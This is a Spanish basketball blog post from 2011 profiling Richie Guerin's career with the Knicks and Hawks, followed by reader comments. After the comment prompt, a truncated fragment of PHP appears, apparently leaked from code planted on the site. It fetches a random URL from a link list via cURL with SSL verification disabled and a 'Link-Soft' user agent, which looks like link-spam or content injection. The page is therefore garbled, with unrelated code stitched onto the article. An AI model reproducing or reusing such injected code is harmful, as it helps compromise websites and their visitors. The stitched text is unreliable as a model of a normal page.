¿Quién fue Richie Guerin?

07 de April de 2011 por txusma

Leo en un artículo de la ESPN que Lebron James ha alcanzado los 2000 puntos en una temporada por sexta vez en su carrera y que además, en todas esas ocasiones, ha repartido más de 500 asistencias y cogido más de 500 rebotes. Tan solo Oscar Robertson y él lo han conseguido tantas veces. De hecho, sólo 6 hombres han logrado superar estas marcas en alguna de sus temporadas en activo: los ya mencionados Lebron James y Oscar Robertson (6), Larry Bird (3), Michael Jordan y John Havlicek (2) y… Richie Guerin (1). Conocemos de sobra a los primeros integrantes de esta lista, miembros todos del HOF (excepto Lebron, claro), pero… ¿quién fue Richie Guerin?

Si eres aficionado de los Knicks sería imperdonable que el nombre de Richie Guerin no te sonara de nada ya que se trata de uno de los jugadores más queridos y admirados de la historia de la franquicia de la Gran Manzana. Guerin era una auténtica máquina de anotar, un pasador expepcional y uno de los mejores bases reboteadores de todos los tiempos. Fue el primer jugador de los Knicks en sobrepasar los 2000 puntos en una temporada y además tuvo durante muchos años los récords de anotación (57 puntos, todavía la 2ª mejor marca de la franquicia) y de asistencias (21) en un partido.

Richard Vincent Guerin fue escogido por los Knicks en la posición 17 del draft de 1954 pero no pudo llegar al equipo hasta 2 temporadas después debido al servicio militar que cumplió en el Cuerpo de  Marines. Posiblemente su paso por los Marines, junto a los 4 años que se pasó jugando de pívot en la universidad de Iona, influenciaron en su estilo de juego: muy duro y extremadamente competitivo.

Rápidamente se hizo un hueco en la liga. Ya en su segunda temporada fue escogido para jugar el AllStar Game, la primera de sus 6 presencias consecutivas. Al año siguiente repartió 21 asistencias en un partido (Diciembre de 1958 frente St. Louis), lideró al equipo en asistencias y fue su segundo mejor anotador. La temporada 1958/1959 fue la única en que los Knicks de Guerin se clasificaron para los Playoffs, en los que cayeron en primera ronda frente los Syracuse Nationals.

Su cuarta temporada en la NBA le consagró como un anotador letal. Promedió 21’8 puntos por partidos (el mejor de los Knicks) y anotó 57 puntos en diciembre de 1959 frente los Syracuse National, la mejor marca anotadora de la franquicia hasta el momento, rota posteriormente en 1984 por Bernard King en un partido frente New Jersey. Aquel año promedió además 6’8 rebotes y 6’3 asistencias. A la temporada siguiente su promedió reboteador se enfiló hasta las 7’9 capturas por partido a la vez que mantenía sus números en puntos y asistencias pero no fue hasta la 1961/1962 que no superó los 2000 puntos en una temporada, el primer “Knickbocker” que lo conseguía en aquellos tiempos. Promedió 29’5 puntos, 6’4 rebotes y 6’9 puntos por partido, convirtiéndose en el primer jugador de la historia en superar los 2000 puntos, 500 rebotes y 500 asistencias en una misma temporada. Fue el octavo mejor anotador aquel año por detrás de monstruos como Wilt Chamberlain, Wilt Bellamy o Oscar Robertson, y el cuarto mejor asistente. Su esfuerzo fue recompensado con su tercera aparición consecutiva en el segundo mejor quinteto de la temporada.

Al inicio de la temporada 1963/1964, los Knicks traspasaron a Guerin a los St. Louis Hawks cuando el base contaba ya con 31 años. Al dejar la Gran Manzana, Richie Guerin era el segundo máximo encestador de los Knicks de todos los tiempos por detrás de Carl Braun. En el primer partido de los Hawks en el Madison Square Garden, la que había sido su afición de toda la vida le agradeció los servicios prestados con una ovación de 5 minutos.

Guerin llegó a un equipo con innumerables armas ofensivas (Pettit, Wilkens, Hagan…) y sus guarismos bajaron considerablemente. A la temporada siguiente, la 1964/1965, se convirtió en el décimo entrenador de los Hawks en 9 años y disputó aquella temporada y las 2 siguientes como jugador-entrenador. En 1967 decidió retirarse como jugador para centrarse en su labor como técnico, decisión respaldada por el premio al Mejor Entrenador del Año que recibió en 1968. Los Hawks no faltaron a los Playoffs ninguna de las 7 temporadas completas en que les dirigió Richard Guerin.

En las temporadas 1968/1969 y 1969/1970 jugó puntualmente algunos partidos, destacando especialmente su última aparición como jugador a los 37 años. Fue en el cuarto partido de las finales de la conferencia Oeste frente los Lakers. Sus 2 mejores bases estaban renqueantes de sus respectivas lesiones y Guerin se vio obligador a saltar a la cancha. Aquel día anotó 31 puntos, cogió 5 rebotes y repartió 3 asistencias pero no puedo evitar la derrota.

Todavía estaría dos temporadas más como entrenador en los Hawks en las que equipo terminaría con un idéntico balance de 36-46. Hasta la fecha es el entrenador que más veces ha dirigido a los Hawks con 618 partidos, de los que ganó 327 (un 53%).

Después de su retirada como entrenador fue comentarista deportivo y broker en Wall Street y a día de hoy no podemos decir que le hayan ido mal las cosas.

Comenta

4 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Impresionante. Es increíble la cantidad de mitos y de hazañas que ha generado esta liga. ¿31 puntos, 5 rebotes y 3 asistencias de un ex-jugador contra Lakers en una final de conferencia?? qué pasote… eso sólo puede pasarnos a los amarillos. ¿No querrás decir que ya estaba Fisher defendiéndole, no??
    Había oído hablar de él, pero lo tenía muy desubicado.

      Citar

  2. Javijaen dice:
    #2

    @TheDeerHunter No era Fisher quien le defendía, sino otro hombre que te sonará poco: Jerry West… Sí el de la silueta del logo de la NBA. Un HOF al que este máquina le hizo un 8, ¿pero contra Chamberlain que se puede hacer? Curiosamente, el ganador de ese año de la NBA fueron los Knicks (por 2ª y última vez), ironías del destino…

      Citar

  3. Txusma dice:
    #3

    Estoy esperando para comprobar si Vader es un auténtico fan de los Knicks. Conocías a Guerin? 😉

      Citar

  4. Vader dice:
    #4

    No hasta estos extremos, no te voy a enganyar. Habia leido algo buceando por paginas americanas y me sonaba el nombre. Creo que no tiene la camiseta retirada en el Madison, quizas lo mereceria pero pillo una mala epoca a nivel de resultados…

    Muy buen articulo!!!

    Saludos 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>